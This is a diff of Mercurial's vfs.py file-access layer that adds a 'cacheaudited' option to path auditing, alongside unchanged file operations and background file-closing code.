94 with self(path, 'ab') as fp:
95 return fp.write(data)
95 return fp.write(data)
96
96
97 def basename(self, path):
97 def basename(self, path):
98 """return base element of a path (as os.path.basename would do)
98 """return base element of a path (as os.path.basename would do)
99
99
100 This exists to allow handling of strange encoding if needed."""
100 This exists to allow handling of strange encoding if needed."""
101 return os.path.basename(path)
101 return os.path.basename(path)
102
102
103 def chmod(self, path, mode):
103 def chmod(self, path, mode):
104 return os.chmod(self.join(path), mode)
104 return os.chmod(self.join(path), mode)
105
105
106 def dirname(self, path):
106 def dirname(self, path):
107 """return dirname element of a path (as os.path.dirname would do)
107 """return dirname element of a path (as os.path.dirname would do)
108
108
109 This exists to allow handling of strange encoding if needed."""
109 This exists to allow handling of strange encoding if needed."""
110 return os.path.dirname(path)
110 return os.path.dirname(path)
111
111
112 def exists(self, path=None):
112 def exists(self, path=None):
113 return os.path.exists(self.join(path))
113 return os.path.exists(self.join(path))
114
114
115 def fstat(self, fp):
115 def fstat(self, fp):
116 return util.fstat(fp)
116 return util.fstat(fp)
117
117
118 def isdir(self, path=None):
118 def isdir(self, path=None):
119 return os.path.isdir(self.join(path))
119 return os.path.isdir(self.join(path))
120
120
121 def isfile(self, path=None):
121 def isfile(self, path=None):
122 return os.path.isfile(self.join(path))
122 return os.path.isfile(self.join(path))
123
123
124 def islink(self, path=None):
124 def islink(self, path=None):
125 return os.path.islink(self.join(path))
125 return os.path.islink(self.join(path))
126
126
127 def isfileorlink(self, path=None):
127 def isfileorlink(self, path=None):
128 '''return whether path is a regular file or a symlink
128 '''return whether path is a regular file or a symlink
129
129
130 Unlike isfile, this doesn't follow symlinks.'''
130 Unlike isfile, this doesn't follow symlinks.'''
131 try:
131 try:
132 st = self.lstat(path)
132 st = self.lstat(path)
133 except OSError:
133 except OSError:
134 return False
134 return False
135 mode = st.st_mode
135 mode = st.st_mode
136 return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
136 return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
137
137
138 def reljoin(self, *paths):
138 def reljoin(self, *paths):
139 """join various elements of a path together (as os.path.join would do)
139 """join various elements of a path together (as os.path.join would do)
140
140
141 The vfs base is not injected so that path stay relative. This exists
141 The vfs base is not injected so that path stay relative. This exists
142 to allow handling of strange encoding if needed."""
142 to allow handling of strange encoding if needed."""
143 return os.path.join(*paths)
143 return os.path.join(*paths)
144
144
145 def split(self, path):
145 def split(self, path):
146 """split top-most element of a path (as os.path.split would do)
146 """split top-most element of a path (as os.path.split would do)
147
147
148 This exists to allow handling of strange encoding if needed."""
148 This exists to allow handling of strange encoding if needed."""
149 return os.path.split(path)
149 return os.path.split(path)
150
150
151 def lexists(self, path=None):
151 def lexists(self, path=None):
152 return os.path.lexists(self.join(path))
152 return os.path.lexists(self.join(path))
153
153
154 def lstat(self, path=None):
154 def lstat(self, path=None):
155 return os.lstat(self.join(path))
155 return os.lstat(self.join(path))
156
156
157 def listdir(self, path=None):
157 def listdir(self, path=None):
158 return os.listdir(self.join(path))
158 return os.listdir(self.join(path))
159
159
160 def makedir(self, path=None, notindexed=True):
160 def makedir(self, path=None, notindexed=True):
161 return util.makedir(self.join(path), notindexed)
161 return util.makedir(self.join(path), notindexed)
162
162
163 def makedirs(self, path=None, mode=None):
163 def makedirs(self, path=None, mode=None):
164 return util.makedirs(self.join(path), mode)
164 return util.makedirs(self.join(path), mode)
165
165
166 def makelock(self, info, path):
166 def makelock(self, info, path):
167 return util.makelock(info, self.join(path))
167 return util.makelock(info, self.join(path))
168
168
169 def mkdir(self, path=None):
169 def mkdir(self, path=None):
170 return os.mkdir(self.join(path))
170 return os.mkdir(self.join(path))
171
171
172 def mkstemp(self, suffix='', prefix='tmp', dir=None, text=False):
172 def mkstemp(self, suffix='', prefix='tmp', dir=None, text=False):
173 fd, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
173 fd, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
174 dir=self.join(dir), text=text)
174 dir=self.join(dir), text=text)
175 dname, fname = util.split(name)
175 dname, fname = util.split(name)
176 if dir:
176 if dir:
177 return fd, os.path.join(dir, fname)
177 return fd, os.path.join(dir, fname)
178 else:
178 else:
179 return fd, fname
179 return fd, fname
180
180
181 def readdir(self, path=None, stat=None, skip=None):
181 def readdir(self, path=None, stat=None, skip=None):
182 return util.listdir(self.join(path), stat, skip)
182 return util.listdir(self.join(path), stat, skip)
183
183
184 def readlock(self, path):
184 def readlock(self, path):
185 return util.readlock(self.join(path))
185 return util.readlock(self.join(path))
186
186
187 def rename(self, src, dst, checkambig=False):
187 def rename(self, src, dst, checkambig=False):
188 """Rename from src to dst
188 """Rename from src to dst
189
189
190 checkambig argument is used with util.filestat, and is useful
190 checkambig argument is used with util.filestat, and is useful
191 only if destination file is guarded by any lock
191 only if destination file is guarded by any lock
192 (e.g. repo.lock or repo.wlock).
192 (e.g. repo.lock or repo.wlock).
193
193
194 To avoid file stat ambiguity forcibly, checkambig=True involves
194 To avoid file stat ambiguity forcibly, checkambig=True involves
195 copying ``src`` file, if it is owned by another. Therefore, use
195 copying ``src`` file, if it is owned by another. Therefore, use
196 checkambig=True only in limited cases (see also issue5418 and
196 checkambig=True only in limited cases (see also issue5418 and
197 issue5584 for detail).
197 issue5584 for detail).
198 """
198 """
199 srcpath = self.join(src)
199 srcpath = self.join(src)
200 dstpath = self.join(dst)
200 dstpath = self.join(dst)
201 oldstat = checkambig and util.filestat.frompath(dstpath)
201 oldstat = checkambig and util.filestat.frompath(dstpath)
202 if oldstat and oldstat.stat:
202 if oldstat and oldstat.stat:
203 ret = util.rename(srcpath, dstpath)
203 ret = util.rename(srcpath, dstpath)
204 _avoidambig(dstpath, oldstat)
204 _avoidambig(dstpath, oldstat)
205 return ret
205 return ret
206 return util.rename(srcpath, dstpath)
206 return util.rename(srcpath, dstpath)
207
207
208 def readlink(self, path):
208 def readlink(self, path):
209 return os.readlink(self.join(path))
209 return os.readlink(self.join(path))
210
210
211 def removedirs(self, path=None):
211 def removedirs(self, path=None):
212 """Remove a leaf directory and all empty intermediate ones
212 """Remove a leaf directory and all empty intermediate ones
213 """
213 """
214 return util.removedirs(self.join(path))
214 return util.removedirs(self.join(path))
215
215
216 def rmtree(self, path=None, ignore_errors=False, forcibly=False):
216 def rmtree(self, path=None, ignore_errors=False, forcibly=False):
217 """Remove a directory tree recursively
217 """Remove a directory tree recursively
218
218
219 If ``forcibly``, this tries to remove READ-ONLY files, too.
219 If ``forcibly``, this tries to remove READ-ONLY files, too.
220 """
220 """
221 if forcibly:
221 if forcibly:
222 def onerror(function, path, excinfo):
222 def onerror(function, path, excinfo):
223 if function is not os.remove:
223 if function is not os.remove:
224 raise
224 raise
225 # read-only files cannot be unlinked under Windows
225 # read-only files cannot be unlinked under Windows
226 s = os.stat(path)
226 s = os.stat(path)
227 if (s.st_mode & stat.S_IWRITE) != 0:
227 if (s.st_mode & stat.S_IWRITE) != 0:
228 raise
228 raise
229 os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
229 os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
230 os.remove(path)
230 os.remove(path)
231 else:
231 else:
232 onerror = None
232 onerror = None
233 return shutil.rmtree(self.join(path),
233 return shutil.rmtree(self.join(path),
234 ignore_errors=ignore_errors, onerror=onerror)
234 ignore_errors=ignore_errors, onerror=onerror)
235
235
236 def setflags(self, path, l, x):
236 def setflags(self, path, l, x):
237 return util.setflags(self.join(path), l, x)
237 return util.setflags(self.join(path), l, x)
238
238
239 def stat(self, path=None):
239 def stat(self, path=None):
240 return os.stat(self.join(path))
240 return os.stat(self.join(path))
241
241
242 def unlink(self, path=None):
242 def unlink(self, path=None):
243 return util.unlink(self.join(path))
243 return util.unlink(self.join(path))
244
244
245 def tryunlink(self, path=None):
245 def tryunlink(self, path=None):
246 """Attempt to remove a file, ignoring missing file errors."""
246 """Attempt to remove a file, ignoring missing file errors."""
247 util.tryunlink(self.join(path))
247 util.tryunlink(self.join(path))
248
248
249 def unlinkpath(self, path=None, ignoremissing=False):
249 def unlinkpath(self, path=None, ignoremissing=False):
250 return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)
250 return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)
251
251
252 def utime(self, path=None, t=None):
252 def utime(self, path=None, t=None):
253 return os.utime(self.join(path), t)
253 return os.utime(self.join(path), t)
254
254
255 def walk(self, path=None, onerror=None):
255 def walk(self, path=None, onerror=None):
256 """Yield (dirpath, dirs, files) tuple for each directories under path
256 """Yield (dirpath, dirs, files) tuple for each directories under path
257
257
258 ``dirpath`` is relative one from the root of this vfs. This
258 ``dirpath`` is relative one from the root of this vfs. This
259 uses ``os.sep`` as path separator, even you specify POSIX
259 uses ``os.sep`` as path separator, even you specify POSIX
260 style ``path``.
260 style ``path``.
261
261
262 "The root of this vfs" is represented as empty ``dirpath``.
262 "The root of this vfs" is represented as empty ``dirpath``.
263 """
263 """
264 root = os.path.normpath(self.join(None))
264 root = os.path.normpath(self.join(None))
265 # when dirpath == root, dirpath[prefixlen:] becomes empty
265 # when dirpath == root, dirpath[prefixlen:] becomes empty
266 # because len(dirpath) < prefixlen.
266 # because len(dirpath) < prefixlen.
267 prefixlen = len(pathutil.normasprefix(root))
267 prefixlen = len(pathutil.normasprefix(root))
268 for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
268 for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
269 yield (dirpath[prefixlen:], dirs, files)
269 yield (dirpath[prefixlen:], dirs, files)
270
270
271 @contextlib.contextmanager
271 @contextlib.contextmanager
272 def backgroundclosing(self, ui, expectedcount=-1):
272 def backgroundclosing(self, ui, expectedcount=-1):
273 """Allow files to be closed asynchronously.
273 """Allow files to be closed asynchronously.
274
274
275 When this context manager is active, ``backgroundclose`` can be passed
275 When this context manager is active, ``backgroundclose`` can be passed
276 to ``__call__``/``open`` to result in the file possibly being closed
276 to ``__call__``/``open`` to result in the file possibly being closed
277 asynchronously, on a background thread.
277 asynchronously, on a background thread.
278 """
278 """
279 # This is an arbitrary restriction and could be changed if we ever
279 # This is an arbitrary restriction and could be changed if we ever
280 # have a use case.
280 # have a use case.
281 vfs = getattr(self, 'vfs', self)
281 vfs = getattr(self, 'vfs', self)
282 if getattr(vfs, '_backgroundfilecloser', None):
282 if getattr(vfs, '_backgroundfilecloser', None):
283 raise error.Abort(
283 raise error.Abort(
284 _('can only have 1 active background file closer'))
284 _('can only have 1 active background file closer'))
285
285
286 with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
286 with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
287 try:
287 try:
288 vfs._backgroundfilecloser = bfc
288 vfs._backgroundfilecloser = bfc
289 yield bfc
289 yield bfc
290 finally:
290 finally:
291 vfs._backgroundfilecloser = None
291 vfs._backgroundfilecloser = None
292
292
293 class vfs(abstractvfs):
293 class vfs(abstractvfs):
294 '''Operate files relative to a base directory
294 '''Operate files relative to a base directory
295
295
296 This class is used to hide the details of COW semantics and
296 This class is used to hide the details of COW semantics and
297 remote file access from higher level code.
297 remote file access from higher level code.
298
299 'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
300 (b) the base directory is managed by hg and considered sort-of append-only.
301 See pathutil.pathauditor() for details.
298 '''
302 '''
299 def __init__(self, base, audit=True, expandpath=False, realpath=False):
303 def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
304 realpath=False):
300 if expandpath:
305 if expandpath:
301 base = util.expandpath(base)
306 base = util.expandpath(base)
302 if realpath:
307 if realpath:
303 base = os.path.realpath(base)
308 base = os.path.realpath(base)
304 self.base = base
309 self.base = base
305 self._audit = audit
310 self._audit = audit
306 if audit:
311 if audit:
307 self.audit = pathutil.pathauditor(self.base)
312 self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
308 else:
313 else:
309 self.audit = (lambda path, mode=None: True)
314 self.audit = (lambda path, mode=None: True)
310 self.createmode = None
315 self.createmode = None
311 self._trustnlink = None
316 self._trustnlink = None
312
317
313 @util.propertycache
318 @util.propertycache
314 def _cansymlink(self):
319 def _cansymlink(self):
315 return util.checklink(self.base)
320 return util.checklink(self.base)
316
321
317 @util.propertycache
322 @util.propertycache
318 def _chmod(self):
323 def _chmod(self):
319 return util.checkexec(self.base)
324 return util.checkexec(self.base)
320
325
321 def _fixfilemode(self, name):
326 def _fixfilemode(self, name):
322 if self.createmode is None or not self._chmod:
327 if self.createmode is None or not self._chmod:
323 return
328 return
324 os.chmod(name, self.createmode & 0o666)
329 os.chmod(name, self.createmode & 0o666)
325
330
326 def __call__(self, path, mode="r", text=False, atomictemp=False,
331 def __call__(self, path, mode="r", text=False, atomictemp=False,
327 notindexed=False, backgroundclose=False, checkambig=False,
332 notindexed=False, backgroundclose=False, checkambig=False,
328 auditpath=True):
333 auditpath=True):
329 '''Open ``path`` file, which is relative to vfs root.
334 '''Open ``path`` file, which is relative to vfs root.
330
335
331 Newly created directories are marked as "not to be indexed by
336 Newly created directories are marked as "not to be indexed by
332 the content indexing service", if ``notindexed`` is specified
337 the content indexing service", if ``notindexed`` is specified
333 for "write" mode access.
338 for "write" mode access.
334
339
335 If ``backgroundclose`` is passed, the file may be closed asynchronously.
340 If ``backgroundclose`` is passed, the file may be closed asynchronously.
336 It can only be used if the ``self.backgroundclosing()`` context manager
341 It can only be used if the ``self.backgroundclosing()`` context manager
337 is active. This should only be specified if the following criteria hold:
342 is active. This should only be specified if the following criteria hold:
338
343
339 1. There is a potential for writing thousands of files. Unless you
344 1. There is a potential for writing thousands of files. Unless you
340 are writing thousands of files, the performance benefits of
345 are writing thousands of files, the performance benefits of
341 asynchronously closing files is not realized.
346 asynchronously closing files is not realized.
342 2. Files are opened exactly once for the ``backgroundclosing``
347 2. Files are opened exactly once for the ``backgroundclosing``
343 active duration and are therefore free of race conditions between
348 active duration and are therefore free of race conditions between
344 closing a file on a background thread and reopening it. (If the
349 closing a file on a background thread and reopening it. (If the
345 file were opened multiple times, there could be unflushed data
350 file were opened multiple times, there could be unflushed data
346 because the original file handle hasn't been flushed/closed yet.)
351 because the original file handle hasn't been flushed/closed yet.)
347
352
348 ``checkambig`` argument is passed to atomictemplfile (valid
353 ``checkambig`` argument is passed to atomictemplfile (valid
349 only for writing), and is useful only if target file is
354 only for writing), and is useful only if target file is
350 guarded by any lock (e.g. repo.lock or repo.wlock).
355 guarded by any lock (e.g. repo.lock or repo.wlock).
351
356
352 To avoid file stat ambiguity forcibly, checkambig=True involves
357 To avoid file stat ambiguity forcibly, checkambig=True involves
353 copying ``path`` file opened in "append" mode (e.g. for
358 copying ``path`` file opened in "append" mode (e.g. for
354 truncation), if it is owned by another. Therefore, use
359 truncation), if it is owned by another. Therefore, use
355 combination of append mode and checkambig=True only in limited
360 combination of append mode and checkambig=True only in limited
356 cases (see also issue5418 and issue5584 for detail).
361 cases (see also issue5418 and issue5584 for detail).
357 '''
362 '''
358 if auditpath:
363 if auditpath:
359 if self._audit:
364 if self._audit:
360 r = util.checkosfilename(path)
365 r = util.checkosfilename(path)
361 if r:
366 if r:
362 raise error.Abort("%s: %r" % (r, path))
367 raise error.Abort("%s: %r" % (r, path))
363 self.audit(path, mode=mode)
368 self.audit(path, mode=mode)
364 f = self.join(path)
369 f = self.join(path)
365
370
366 if not text and "b" not in mode:
371 if not text and "b" not in mode:
367 mode += "b" # for that other OS
372 mode += "b" # for that other OS
368
373
369 nlink = -1
374 nlink = -1
370 if mode not in ('r', 'rb'):
375 if mode not in ('r', 'rb'):
371 dirname, basename = util.split(f)
376 dirname, basename = util.split(f)
372 # If basename is empty, then the path is malformed because it points
377 # If basename is empty, then the path is malformed because it points
373 # to a directory. Let the posixfile() call below raise IOError.
378 # to a directory. Let the posixfile() call below raise IOError.
374 if basename:
379 if basename:
375 if atomictemp:
380 if atomictemp:
376 util.makedirs(dirname, self.createmode, notindexed)
381 util.makedirs(dirname, self.createmode, notindexed)
377 return util.atomictempfile(f, mode, self.createmode,
382 return util.atomictempfile(f, mode, self.createmode,
378 checkambig=checkambig)
383 checkambig=checkambig)
379 try:
384 try:
380 if 'w' in mode:
385 if 'w' in mode:
381 util.unlink(f)
386 util.unlink(f)
382 nlink = 0
387 nlink = 0
383 else:
388 else:
384 # nlinks() may behave differently for files on Windows
389 # nlinks() may behave differently for files on Windows
385 # shares if the file is open.
390 # shares if the file is open.
386 with util.posixfile(f):
391 with util.posixfile(f):
387 nlink = util.nlinks(f)
392 nlink = util.nlinks(f)
388 if nlink < 1:
393 if nlink < 1:
389 nlink = 2 # force mktempcopy (issue1922)
394 nlink = 2 # force mktempcopy (issue1922)
390 except (OSError, IOError) as e:
395 except (OSError, IOError) as e:
391 if e.errno != errno.ENOENT:
396 if e.errno != errno.ENOENT:
392 raise
397 raise
393 nlink = 0
398 nlink = 0
394 util.makedirs(dirname, self.createmode, notindexed)
399 util.makedirs(dirname, self.createmode, notindexed)
395 if nlink > 0:
400 if nlink > 0:
396 if self._trustnlink is None:
401 if self._trustnlink is None:
397 self._trustnlink = nlink > 1 or util.checknlink(f)
402 self._trustnlink = nlink > 1 or util.checknlink(f)
398 if nlink > 1 or not self._trustnlink:
403 if nlink > 1 or not self._trustnlink:
399 util.rename(util.mktempcopy(f), f)
404 util.rename(util.mktempcopy(f), f)
400 fp = util.posixfile(f, mode)
405 fp = util.posixfile(f, mode)
401 if nlink == 0:
406 if nlink == 0:
402 self._fixfilemode(f)
407 self._fixfilemode(f)
403
408
404 if checkambig:
409 if checkambig:
405 if mode in ('r', 'rb'):
410 if mode in ('r', 'rb'):
406 raise error.Abort(_('implementation error: mode %s is not'
411 raise error.Abort(_('implementation error: mode %s is not'
407 ' valid for checkambig=True') % mode)
412 ' valid for checkambig=True') % mode)
408 fp = checkambigatclosing(fp)
413 fp = checkambigatclosing(fp)
409
414
410 if backgroundclose:
415 if backgroundclose:
411 if not self._backgroundfilecloser:
416 if not self._backgroundfilecloser:
412 raise error.Abort(_('backgroundclose can only be used when a '
417 raise error.Abort(_('backgroundclose can only be used when a '
413 'backgroundclosing context manager is active')
418 'backgroundclosing context manager is active')
414 )
419 )
415
420
416 fp = delayclosedfile(fp, self._backgroundfilecloser)
421 fp = delayclosedfile(fp, self._backgroundfilecloser)
417
422
418 return fp
423 return fp
419
424
420 def symlink(self, src, dst):
425 def symlink(self, src, dst):
421 self.audit(dst)
426 self.audit(dst)
422 linkname = self.join(dst)
427 linkname = self.join(dst)
423 util.tryunlink(linkname)
428 util.tryunlink(linkname)
424
429
425 util.makedirs(os.path.dirname(linkname), self.createmode)
430 util.makedirs(os.path.dirname(linkname), self.createmode)
426
431
427 if self._cansymlink:
432 if self._cansymlink:
428 try:
433 try:
429 os.symlink(src, linkname)
434 os.symlink(src, linkname)
430 except OSError as err:
435 except OSError as err:
431 raise OSError(err.errno, _('could not symlink to %r: %s') %
436 raise OSError(err.errno, _('could not symlink to %r: %s') %
432 (src, err.strerror), linkname)
437 (src, err.strerror), linkname)
433 else:
438 else:
434 self.write(dst, src)
439 self.write(dst, src)
435
440
436 def join(self, path, *insidef):
441 def join(self, path, *insidef):
437 if path:
442 if path:
438 return os.path.join(self.base, path, *insidef)
443 return os.path.join(self.base, path, *insidef)
439 else:
444 else:
440 return self.base
445 return self.base
441
446
442 opener = vfs
447 opener = vfs
443
448
444 class proxyvfs(object):
449 class proxyvfs(object):
445 def __init__(self, vfs):
450 def __init__(self, vfs):
446 self.vfs = vfs
451 self.vfs = vfs
447
452
448 @property
453 @property
449 def options(self):
454 def options(self):
450 return self.vfs.options
455 return self.vfs.options
451
456
452 @options.setter
457 @options.setter
453 def options(self, value):
458 def options(self, value):
454 self.vfs.options = value
459 self.vfs.options = value
455
460
456 class filtervfs(abstractvfs, proxyvfs):
461 class filtervfs(abstractvfs, proxyvfs):
457 '''Wrapper vfs for filtering filenames with a function.'''
462 '''Wrapper vfs for filtering filenames with a function.'''
458
463
459 def __init__(self, vfs, filter):
464 def __init__(self, vfs, filter):
460 proxyvfs.__init__(self, vfs)
465 proxyvfs.__init__(self, vfs)
461 self._filter = filter
466 self._filter = filter
462
467
463 def __call__(self, path, *args, **kwargs):
468 def __call__(self, path, *args, **kwargs):
464 return self.vfs(self._filter(path), *args, **kwargs)
469 return self.vfs(self._filter(path), *args, **kwargs)
465
470
466 def join(self, path, *insidef):
471 def join(self, path, *insidef):
467 if path:
472 if path:
468 return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
473 return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
469 else:
474 else:
470 return self.vfs.join(path)
475 return self.vfs.join(path)
471
476
472 filteropener = filtervfs
477 filteropener = filtervfs
473
478
474 class readonlyvfs(abstractvfs, proxyvfs):
479 class readonlyvfs(abstractvfs, proxyvfs):
475 '''Wrapper vfs preventing any writing.'''
480 '''Wrapper vfs preventing any writing.'''
476
481
477 def __init__(self, vfs):
482 def __init__(self, vfs):
478 proxyvfs.__init__(self, vfs)
483 proxyvfs.__init__(self, vfs)
479
484
480 def __call__(self, path, mode='r', *args, **kw):
485 def __call__(self, path, mode='r', *args, **kw):
481 if mode not in ('r', 'rb'):
486 if mode not in ('r', 'rb'):
482 raise error.Abort(_('this vfs is read only'))
487 raise error.Abort(_('this vfs is read only'))
483 return self.vfs(path, mode, *args, **kw)
488 return self.vfs(path, mode, *args, **kw)
484
489
485 def join(self, path, *insidef):
490 def join(self, path, *insidef):
486 return self.vfs.join(path, *insidef)
491 return self.vfs.join(path, *insidef)
487
492
488 class closewrapbase(object):
493 class closewrapbase(object):
489 """Base class of wrapper, which hooks closing
494 """Base class of wrapper, which hooks closing
490
495
491 Do not instantiate outside of the vfs layer.
496 Do not instantiate outside of the vfs layer.
492 """
497 """
493 def __init__(self, fh):
498 def __init__(self, fh):
494 object.__setattr__(self, r'_origfh', fh)
499 object.__setattr__(self, r'_origfh', fh)
495
500
496 def __getattr__(self, attr):
501 def __getattr__(self, attr):
497 return getattr(self._origfh, attr)
502 return getattr(self._origfh, attr)
498
503
499 def __setattr__(self, attr, value):
504 def __setattr__(self, attr, value):
500 return setattr(self._origfh, attr, value)
505 return setattr(self._origfh, attr, value)
501
506
502 def __delattr__(self, attr):
507 def __delattr__(self, attr):
503 return delattr(self._origfh, attr)
508 return delattr(self._origfh, attr)
504
509
505 def __enter__(self):
510 def __enter__(self):
506 return self._origfh.__enter__()
511 return self._origfh.__enter__()
507
512
508 def __exit__(self, exc_type, exc_value, exc_tb):
513 def __exit__(self, exc_type, exc_value, exc_tb):
509 raise NotImplementedError('attempted instantiating ' + str(type(self)))
514 raise NotImplementedError('attempted instantiating ' + str(type(self)))
510
515
511 def close(self):
516 def close(self):
512 raise NotImplementedError('attempted instantiating ' + str(type(self)))
517 raise NotImplementedError('attempted instantiating ' + str(type(self)))
513
518
514 class delayclosedfile(closewrapbase):
519 class delayclosedfile(closewrapbase):
515 """Proxy for a file object whose close is delayed.
520 """Proxy for a file object whose close is delayed.
516
521
517 Do not instantiate outside of the vfs layer.
522 Do not instantiate outside of the vfs layer.
518 """
523 """
519 def __init__(self, fh, closer):
524 def __init__(self, fh, closer):
520 super(delayclosedfile, self).__init__(fh)
525 super(delayclosedfile, self).__init__(fh)
521 object.__setattr__(self, r'_closer', closer)
526 object.__setattr__(self, r'_closer', closer)
522
527
523 def __exit__(self, exc_type, exc_value, exc_tb):
528 def __exit__(self, exc_type, exc_value, exc_tb):
524 self._closer.close(self._origfh)
529 self._closer.close(self._origfh)
525
530
526 def close(self):
531 def close(self):
527 self._closer.close(self._origfh)
532 self._closer.close(self._origfh)
528
533
529 class backgroundfilecloser(object):
534 class backgroundfilecloser(object):
530 """Coordinates background closing of file handles on multiple threads."""
535 """Coordinates background closing of file handles on multiple threads."""
531 def __init__(self, ui, expectedcount=-1):
536 def __init__(self, ui, expectedcount=-1):
532 self._running = False
537 self._running = False
533 self._entered = False
538 self._entered = False
534 self._threads = []
539 self._threads = []
535 self._threadexception = None
540 self._threadexception = None
536
541
537 # Only Windows/NTFS has slow file closing. So only enable by default
542 # Only Windows/NTFS has slow file closing. So only enable by default
538 # on that platform. But allow to be enabled elsewhere for testing.
543 # on that platform. But allow to be enabled elsewhere for testing.
539 defaultenabled = pycompat.osname == 'nt'
544 defaultenabled = pycompat.osname == 'nt'
540 enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
545 enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
541
546
542 if not enabled:
547 if not enabled:
543 return
548 return
544
549
545 # There is overhead to starting and stopping the background threads.
550 # There is overhead to starting and stopping the background threads.
546 # Don't do background processing unless the file count is large enough
551 # Don't do background processing unless the file count is large enough
547 # to justify it.
552 # to justify it.
548 minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
553 minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
549 # FUTURE dynamically start background threads after minfilecount closes.
554 # FUTURE dynamically start background threads after minfilecount closes.
550 # (We don't currently have any callers that don't know their file count)
555 # (We don't currently have any callers that don't know their file count)
551 if expectedcount > 0 and expectedcount < minfilecount:
556 if expectedcount > 0 and expectedcount < minfilecount:
552 return
557 return
553
558
554 maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
559 maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
555 threadcount = ui.configint('worker', 'backgroundclosethreadcount')
560 threadcount = ui.configint('worker', 'backgroundclosethreadcount')
556
561
557 ui.debug('starting %d threads for background file closing\n' %
562 ui.debug('starting %d threads for background file closing\n' %
558 threadcount)
563 threadcount)
559
564
560 self._queue = util.queue(maxsize=maxqueue)
565 self._queue = util.queue(maxsize=maxqueue)
561 self._running = True
566 self._running = True
562
567
563 for i in range(threadcount):
568 for i in range(threadcount):
564 t = threading.Thread(target=self._worker, name='backgroundcloser')
569 t = threading.Thread(target=self._worker, name='backgroundcloser')
565 self._threads.append(t)
570 self._threads.append(t)
566 t.start()
571 t.start()
567
572
568 def __enter__(self):
573 def __enter__(self):
569 self._entered = True
574 self._entered = True
570 return self
575 return self
571
576
572 def __exit__(self, exc_type, exc_value, exc_tb):
577 def __exit__(self, exc_type, exc_value, exc_tb):
573 self._running = False
578 self._running = False
574
579
575 # Wait for threads to finish closing so open files don't linger for
580 # Wait for threads to finish closing so open files don't linger for
576 # longer than lifetime of context manager.
581 # longer than lifetime of context manager.
577 for t in self._threads:
582 for t in self._threads:
578 t.join()
583 t.join()
579
584
580 def _worker(self):
585 def _worker(self):
581 """Main routine for worker thread."""
586 """Main routine for worker thread."""
582 while True:
587 while True:
583 try:
588 try:
584 fh = self._queue.get(block=True, timeout=0.100)
589 fh = self._queue.get(block=True, timeout=0.100)
585 # Need to catch or the thread will terminate and
590 # Need to catch or the thread will terminate and
586 # we could orphan file descriptors.
591 # we could orphan file descriptors.
587 try:
592 try:
588 fh.close()
593 fh.close()
589 except Exception as e:
594 except Exception as e:
590 # Stash so can re-raise from main thread later.
595 # Stash so can re-raise from main thread later.
591 self._threadexception = e
596 self._threadexception = e
592 except util.empty:
597 except util.empty:
593 if not self._running:
598 if not self._running:
594 break
599 break
595
600
596 def close(self, fh):
601 def close(self, fh):
597 """Schedule a file for closing."""
602 """Schedule a file for closing."""
598 if not self._entered:
603 if not self._entered:
599 raise error.Abort(_('can only call close() when context manager '
604 raise error.Abort(_('can only call close() when context manager '
600 'active'))
605 'active'))
601
606
602 # If a background thread encountered an exception, raise now so we fail
607 # If a background thread encountered an exception, raise now so we fail
603 # fast. Otherwise we may potentially go on for minutes until the error
608 # fast. Otherwise we may potentially go on for minutes until the error
604 # is acted on.
609 # is acted on.
605 if self._threadexception:
610 if self._threadexception:
606 e = self._threadexception
611 e = self._threadexception
607 self._threadexception = None
612 self._threadexception = None
608 raise e
613 raise e
609
614
610 # If we're not actively running, close synchronously.
615 # If we're not actively running, close synchronously.
611 if not self._running:
616 if not self._running:
612 fh.close()
617 fh.close()
613 return
618 return
614
619
615 self._queue.put(fh, block=True, timeout=None)
620 self._queue.put(fh, block=True, timeout=None)
616
621
617 class checkambigatclosing(closewrapbase):
622 class checkambigatclosing(closewrapbase):
618 """Proxy for a file object, to avoid ambiguity of file stat
623 """Proxy for a file object, to avoid ambiguity of file stat
619
624
620 See also util.filestat for detail about "ambiguity of file stat".
625 See also util.filestat for detail about "ambiguity of file stat".
621
626
622 This proxy is useful only if the target file is guarded by any
627 This proxy is useful only if the target file is guarded by any
623 lock (e.g. repo.lock or repo.wlock)
628 lock (e.g. repo.lock or repo.wlock)
624
629
625 Do not instantiate outside of the vfs layer.
630 Do not instantiate outside of the vfs layer.
626 """
631 """
627 def __init__(self, fh):
632 def __init__(self, fh):
628 super(checkambigatclosing, self).__init__(fh)
633 super(checkambigatclosing, self).__init__(fh)
629 object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
634 object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
630
635
631 def _checkambig(self):
636 def _checkambig(self):
632 oldstat = self._oldstat
637 oldstat = self._oldstat
633 if oldstat.stat:
638 if oldstat.stat:
634 _avoidambig(self._origfh.name, oldstat)
639 _avoidambig(self._origfh.name, oldstat)
635
640
636 def __exit__(self, exc_type, exc_value, exc_tb):
641 def __exit__(self, exc_type, exc_value, exc_tb):
637 self._origfh.__exit__(exc_type, exc_value, exc_tb)
642 self._origfh.__exit__(exc_type, exc_value, exc_tb)
638 self._checkambig()
643 self._checkambig()
639
644
640 def close(self):
645 def close(self):
641 self._origfh.close()
646 self._origfh.close()
642 self._checkambig()
647 self._checkambig()
@@ -1,476 +1,484 b''
1 # windows.py - Windows utility function implementations for Mercurial
1 # windows.py - Windows utility function implementations for Mercurial
2 #
2 #
